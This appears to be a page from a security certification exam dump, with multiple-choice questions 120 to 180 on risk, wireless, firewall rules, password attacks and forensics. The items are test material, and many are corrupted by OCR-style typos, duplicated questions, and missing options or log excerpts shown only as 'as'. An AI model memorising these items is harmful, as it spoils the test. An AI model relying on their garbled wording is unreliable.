A security control objective cannot be met through a technical change, so the company purchases insurance and is no longer concerned about losses from data breaches

B.

A security control objective cannot be met through a technical change, so the company implements a pokey to train users on a more secure method of operation

C.

A security control objective cannot be met through a technical change, so the company performs regular audits to determine it violations have occurred

D.

A security control objective cannot be met through a technical change, so the Chief Information Officer decides to sign off on the risk.

Question 120

A routine audit of medical billing claims revealed that several claims were submitted without the subscriber's knowledge A review of the audit logs for the medical billing company's system indicated a company employee downloaded customer records and adjusted the direct deposit information to a personal bank account Which of the following does this action describe?

Options:

A.

Insider threat

B.

Social engineering

C.

Third-party risk

D.

Data breach

Question 121

A security engineer must deploy two wireless routers in an office suite Other tenants in the office building should not be able to connect to this wireless network Which of the following protocols should the engineer implement to ensure the strongest encryption?

Options:

A.

WPS

B.

WPA2

C.

WAP

D.

HTTPS

Question 122

A security analyst discovers several jpg photos from a cellular phone during a forensics investigation involving a compromised system The analyst runs a forensics tool to gather file metadata Which of the following would be part of the images if all the metadata is still intact?

Options:

A.

The GSS location

B.

When the file was deleted

C.

The total number of print jobs

D.

The number of copies made

Question 123

During a recent penetration test, a tester plugged a laptop into an Ethernet port in an unoccupied conference room and obtained a valid IP address. Which of the following would have best prevented this avenue of attack?

Options:

A.

Enabling MAC address filtering

B.

Moving printers inside a firewall

C.

Implementing 802.IX

D.

Using network port security

Question 124

An analyst is concerned about data leaks and wants to restrict access to internet services to authorized users only. The analyst also wants to control the actions each user can perform on each service. Which of the following would be the best technology for the analyst to consider implementing?

Options:

A.

DLP

B.

VPC

C.

CASB

D.

Content filtering

Question 125

Which of the following describes the ability of code to target a hypervisor from inside a guest OS?

Options:

A.

Fog computing

B.

VM escape

C.

Software-defined networking

D.

Image forgery

E.

Container breakout

Question 126

A security analyst has been reading about a newly discovered cyberattack from a known threat actor Which of the following would best support the analyst's review of the tactics, techniques, and protocols the throat actor was observed using in previous campaigns?

Options:

A.

Security research publications

B.

The MITRE ATT4CK framework

C.

The Diamond Model of Intrusion Analysis

D.

The Cyber Kill Cham

Question 127

A cybersecurity analyst reviews the log files from a web server end sees a series of files that indicate a directory traversal attack has occurred Which of the following is the analyst most likely seeing?

Options:

A.

B.

C.

D.

Question 128

The most recent vulnerability scan flagged the domain controller with a critical vulnerability. The systems administrator researched the vulnerability and discovered the domain controller

does not run the associated application with the vulnerability. Which of the following steps should the administrator take next?

Options:

A.

Ensure the scan engine is configured correctly.

B.

Apply a patch to the domain controller.

C.

Research the CVE.

D.

Document this as a false positive.

Question 129

Which of the following is an example of risk avoidance?

Options:

A.

Installing security updates directly in production to expedite vulnerability fixes

B.

Buying insurance to prepare for financial loss associated with exploits

C.

Not installing new software to prevent compatibility errors

D.

Not taking preventive measures to stop the theft of equipment

Question 130

A secondly administration is trying to determine whether a server is vulnerable to a range of attacks After using a tool, the administrator obtains the following output.

as

Which of the following attacks was successfully implemented based on the output?

Options:

A.

Memory leak

B.

Race condition

C.

SQL injection

D.

Directory traversal

Question 131

Which of the following teams combines both offensive and defensive testing techniques to protect an organization's critical systems?

Options:

A.

Red

B.

Blue

C.

Purple

D.

Yellow

Question 132

An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is the attacker most likely attempting?

Options:

A.

A spear-phishing attach

B.

A watering-hole attack

C.

Typo squatting

D.

A phishing attack

Question 133

Which of the following test describes the risk that is present once mitigations are applied?

Options:

A.

Control risk

B.

Residual risk

C.

Inherent risk

D.

Risk awareness

Question 134

Which of the following security controls s sed to isolate a section of the network and its externally available resources from the internal corporate network in order to reduce the number of

possible attacks?

Options:

A.

Faraday cages

B.

Air gap

C.

Vaulting

D.

Proximity readers

Question 135

Which of the following is used to validate a certificate when it is presented to a user?

Options:

A.

OCSP

B.

CSR

C.

CA

D.

CRC

Question 136

A building manager is concerned about people going in and out of the office during non-working hours. Which of the following physical security controls would provide the best solution?

Options:

A.

Cameras

B.

Badges

C.

Locks

D.

Bollards

Question 137

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be secure. Which of the following can be used?

Options:

A.

SMIME

B.

LDAPS

C.

SSH

D.

SRTP

Question 138

Which Of the following best ensures minimal downtime for organizations vÄh crit-ical computing equipment located in earthquake-prone areas?

Options:

A.

Generators and UPS

B.

Off-site replication

C.

Additional warm site

D.

Local

Question 139

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to best meet the requirement?

Options:

A.

Fog computing and KVMs

B.

VDI and thin clients

C.

Private cloud and DLP

D.

Full drive encryption and thick clients

Question 140

A user enters a password to log in to a workstation and is then prompted to enter an authentication code Which of the following MFA factors or attributes are being utilized in the authentication process? {Select two).

Options:

A.

Something you know

B.

Something you have

C.

Somewhere you are

D.

Someone you know

E.

Something you are

F.

Something you can do

Question 141

Cloud security engineers are planning to allow and deny access to specific features in order to in-crease data security. Which of the following cloud features is the most appropriate to ensure ac-cess is granted properly?

Options:

A.

API integrations

B.

Auditing

C.

Resource policies

D.

Virtual networks

Question 142

A security analyst is investigating what appears to be unauthorized access to a corporate web application. The security analyst reviews the web server logs and finds the following entries:

as

Which of the following password attacks is taking place?

Options:

A.

Dictionary

B.

Brute-force

C.

Rainbow table

D.

Spraying

Question 143

A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.

INSTRUCTIONS

Please click on the below items on the network diagram and configure them accordingly:

  • WAP
  • DHCP Server
  • AAA Server
  • Wireless Controller
  • LDAP Server

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

as

as

Options:

Question 144

A company's help desk has received calls about the wireless network being down and users being unable to connect to it The network administrator says all access points are up and running One of the help desk technicians notices the affected users are working in a building near the parking lot. Which of the following is the most likely reason for the outage?

Options:

A.

Someone near the building is jamming the signal

B.

A user has set up a rogue access point near the building

C.

Someone set up an evil twin access point in the affected area.

D.

The APs in the affected area have been unplugged from the network

Question 145

A security analyst is looking for a solution to help communicate to the leadership team the seventy levels of the organization's vulnerabilities. Which of the following would best meet this need?

Options:

A.

CVE

B.

SIEM

C.

SOAR

D.

CVSS

Question 146

Which Of the following supplies non-repudiation during a forensics investiga-tion?

Options:

A.

Dumping volatile memory contents first

B.

Duplicating a drive With dd

C.

a SHA 2 signature of a drive image

D.

Logging everyone in contact with evidence

E.

Encrypting sensitive data

Question 147

Which of the following supplies non-repudiation during a forensics investigation?

Options:

A.

Dumping volatile memory contents first

B.

Duplicating a drive with dd

C.

Using a SHA-2 signature of a drive image

D.

Logging everyone in contact with evidence

E.

Encrypting sensitive data

Question 148

During a recent security assessment, a vulnerability was found in a common OS. The OS vendor was unaware of the issue and promised to release a patch within the next quarter. Which of the following best describes this type of vulnerability?

Options:

A.

Legacy operating system

B.

Weak configuration

C.

Zero day

D.

Supply chain

Question 149

A customer called a company's security team to report that all invoices the customer has received over the last five days from the company appear to have fraudulent banking details. An investigation into the matter reveals the following

• The manager of the accounts payable department is using the same password across multiple external websites and the corporate account

• One of the websites the manager used recently experienced a data breach.

• The manager's corporate email account was successfully accessed in the last five days by an IP address located in a foreign country.

Which of the following attacks has most likely been used to compromise the manager's corporate account?

Options:

A.

Remote access Trojan

B.

Brute-force

C.

Dictionary

D.

Credential stuffing

E.

Password spraying

Question 150

Which of the following are common VoIP-associated vulnerabilities? (Select two).

Options:

A.

SPIM

B.

Vishing

C.

VLAN hopping

D.

Phishing

E.

DHCP snooping

F.

Tailgating

Question 151

Which of the following automation use cases would best enhance the security posture Of an organi-zation by rapidly updating permissions when employees leave a company Or change job roles inter-nally?

Options:

A.

Provisioning resources

B.

Disabling access

C.

APIs

D.

Escalating permission requests

Question 152

Which Of the following is the best method for ensuring non-repudiation?

Options:

A.

SSO

B.

Digital certificate

C.

Token

D.

SSH key

Question 153

An information security officer at a credit card transaction company is conducting a framework-mapping exercise with the internal controls. The company recently established a new office in Europe. To which of the following frameworks should the security officer map the existing controls' (Select two).

Options:

A.

ISO

B.

PCI DSS

C.

SOC

D.

GDPR

E.

CSA

F.

NIST

Question 154

A security analyst discovers that one of the web APIs is being abused by an unknown third party. Logs indicate that the third party is attempting to manipulate the parameters being passed to the API endpoint. Which of the following solutions would best help to protect against the attack?

Options:

A.

DLP

B.

SIEM

C.

NIDS

D.

WAF

Question 155

A security professional wants to enhance the protection of a critical environment that is Used to store and manage a company's encryption keys. The selected technology should be tamper resistant. Which of the following should the security professional implement to achieve the goal?

Options:

A.

DLP

B.

HSM

C.

CA

D.

FIM

Question 156

During a security incident the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9 A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network. Which of the following fulfills this request?

Options:

A.

access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32

B.

access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

C.

access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0

D.

access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32

Question 157

A company is developing a business continuity strategy and needs to determine how many staff members would be required to sustain the business in the case of a disruption.

Which of the following best describes this step?

Options:

A.

Capacity planning

B.

Redundancy

C.

Geographic dispersion

D.

Tabletop exercise

Question 158

A company's help desk has received calls about the wireless network being down and users being unable to connect to it. The network administrator says all access pcints are up and running. One of the help desk technicians notices the affected users are working in a near the parking Jot Which Of the following IS the most likely reason for the outage?

Options:

A.

Someone near the is jamming the signal.

B.

A user has set up a rogue access point near building.

C.

Someone set up an evil twin access Print in tie affected area.

D.

The APS in the affected area have been from the network

Question 159

A security analyst receives an alert from the company's S1EM that anomalous activity is coming from a local source IP address of 192 168 34.26 The Chief Information Security Officer asks the analyst to block the originating source Several days later another employee opens an internal ticket stating that vulnerability scans are no longer being performed property. The IP address the employee provides is 192 168.34 26. Which of the following describes this type of alert?

Options:

A.

True positive

B.

True negative

C.

False positive

D.

False negative

Question 160

A security administrator needs to inspect in-transit files on the enterprise network to search for PI I credit card data, and classification words Which of the following would be the best to use?

Options:

A.

IDS solution

B.

EDR solution

C.

HIPS software solution

D.

Network DLP solution

Question 161

A company wants to build a new website to sell products online. The website wd I host a storefront application that allow visitors to add products to a shopping cart and pay for products using a credit card. which Of the following protocols •would be most secure to implement?

Options:

A.

SSL

B.

SFTP

C.

SNMP

D.

TLS

Question 162

A company's help desk received several AV alerts indicating Mimikatz attempted to run on the remote systems Several users also reported that the new company flash drives they picked up in the break room only have 512KB of storage Which of the following is most likely the cause?

Options:

A.

The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts the drives to only 512KB of storage

B.

The new flash drives need a driver that is being blocked by the AV software because the flash drives are not on the application's allow list, temporarily restricting the drives to 512KB of storage.

C.

The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an unapproved application to repartition the drives.

D.

The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memory.

Question 163

An organization experiences a cybersecurity incident involving a command-and-control server. Which of the following logs should be analyzed to identify the impacted host? (Select two).

Options:

A.

Application

B.

Authentication

C.

Error

D.

Network

E.

Firewall

F.

System

Question 164

Which of the following will increase cryptographic security?

Options:

A.

High data entropy

B.

Algorithms that require less computing power

C.

Longer key longevity

D.

Hashing

Question 165

A web server has been compromised due to a ransomware attack. Further Investigation reveals the ransomware has been in the server for the past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator use to restore services to a secure state?

Options:

A.

The last incremental backup that was conducted 72 hours ago

B.

The last known-good configuration stored by the operating system

C.

The last full backup that was conducted seven days ago

D.

The baseline OS configuration

Question 166

A network manager is concerned that business may be negatively impacted if the firewall in its data center goes offline. The manager would like to implement a high availability pair to:

Options:

A.

decrease the mean time between failures.

B.

remove the single point of failure.

C.

cut down the mean time to repair

D.

reduce the recovery time objective

Question 167

Law enforcement officials sent a company a notification that states electronically stored information and paper documents cannot be destroyed. Which of the following explains this process?

Options:

A.

Data breach notification

B.

Accountability

C.

Legal hold

D.

Chain of custody

Question 168

Security analysts notice a server login from a user who has been on vacation for two weeks, The an-alysts confirm that the user did not log in to the system while on vacation After reviewing packet capture the analysts notice the following:

Which of the following occurred?

Options:

A.

A buffer overflow was exploited to gain unauthorized access.

B.

The user's account was con-promised, and an attacker changed the login credentials.

C.

An attacker used a pass-the-hash attack to gain access.

D.

An insider threat with username logged in to the account.

Question 169

An organization routes all of its traffic through a VPN Most users are remote and connect into a corporate data center that houses confidential information There is a firewall at the internet border, followed by a DLP appliance, the VPN server and the data center itself Which of the following is the weakest design element?

Options:

A.

The DLP appliance should be integrated into a NGFW.

B.

Split-tunnel connections can negatively impact the DLP appliance's performance.

C.

Encrypted VPN traffic will not be inspected when entering or leaving the network.

D.

Adding two hops in the VPN tunnel may slow down remote connections

Question 170

An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages, and SFTP, and to specifically block FTP. Which of the following would BEST accomplish this goal?

Options:

A.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any Any 67 -Allow: Any Any 68 -Allow: Any Any 22 -Deny: Any Any 21 -Deny: Any Any

B.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any Any 67 -Allow: Any Any 68 -Deny: Any Any 22 -Allow: Any Any 21 -Deny: Any Any

C.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any Any 22 -Deny: Any Any 67 -Deny: Any Any 68 -Deny: Any Any 21 -Allow: Any Any

D.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Deny: Any Any 67 -Allow: Any Any 68 -Allow: Any Any 22 -Allow: Any Any 21 -Allow: Any Any

Question 171

Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS

Not all attacks and remediation actions will be used.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

as

Options:

Question 172

A company wants the ability to restrict web access and monitor the websites that employees visit, Which Of the following would best meet these requirements?

Options:

A.

Internet Proxy

B.

VPN

C.

WAF

D.

Firewall

Question 173

An annual information security has revealed that several OS-level configurations are not in compliance due to Outdated hardening standards the company is using Which Of the following would be best to use to update and reconfigure the OS.level security configurations?

Options:

A.

CIS benchmarks

B.

GDPR guidance

C.

Regional regulations

D.

ISO 27001 standards

Question 174

An audit identified Pll being utilized in the development environment of a crit-ical application. The Chief Privacy Officer (CPO) is adamant that this data must be removed: however, the developers are concerned that without real data they cannot perform functionality tests and search for specific data. Which of the following should a security professional implement to best satisfy both the CPOs and the development team's requirements?

Options:

A.

Data purge

B.

Data encryption

C.

Data masking

D.

Data tokenization

Question 175

Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer's Pll?

Options:

A.

SCAP

B.

NetFlow

C.

Antivirus

D.

DLP

Question 176

A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?

Options:

A.

Setting an explicit deny to all traffic using port 80 instead of 443

B.

Moving the implicit deny from the bottom of the rule set to the top

C.

Configuring the first line in the rule set to allow all traffic

D.

Ensuring that port 53 has been explicitly allowed in the rule set

Question 177

A company is auditing the manner in which its European customers’ personal information is handled. Which of the following should the company consult?

Options:

A.

GDPR

B.

ISO

C.

NIST

D.

PCI DSS

Question 178

To reduce and limit software and infrastructure costs the Chief Information Officer has requested to move email services to the cloud. The cloud provider and the organization must have secunty controls to protect sensitive data Which of the following cloud services would best accommodate the request?

Options:

A.

laaS

B.

PaaS

C.

DaaS

D.

SaaS

Question 179

An organization has hired a security analyst to perform a penetration test The analyst captures 1Gb worth of inbound network traffic to the server and transfers the pcap back to the machine for

analysis. Which of the following tools should the analyst use to further review the pcap?

Options:

A.

Nmap

B.

CURL

C.

Neat

D.

Wireshark

Question 180

A cyber security administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall Which of the following would be the best option to remove the rules?

Options:

A.

# iptables -t mangle -X

B.

# iptables -F

C.

# iptables -2

D.

# iptables -P INPUT -j DROP

Page: 1 / 61
Total 607 questions